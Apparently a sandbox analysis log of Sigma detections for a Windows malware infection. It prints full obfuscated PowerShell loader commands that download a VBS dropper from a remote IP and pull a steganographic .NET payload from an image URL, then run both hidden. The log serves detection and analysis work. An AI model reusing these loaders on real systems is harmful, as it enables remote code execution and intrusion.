'KCgnezF9aW1hZ2VVcmwnKycgPSA

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 768, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3Nl

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgI

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 768, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3Nl

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline", ProcessId: 2212, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6720, TargetFilename: C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, 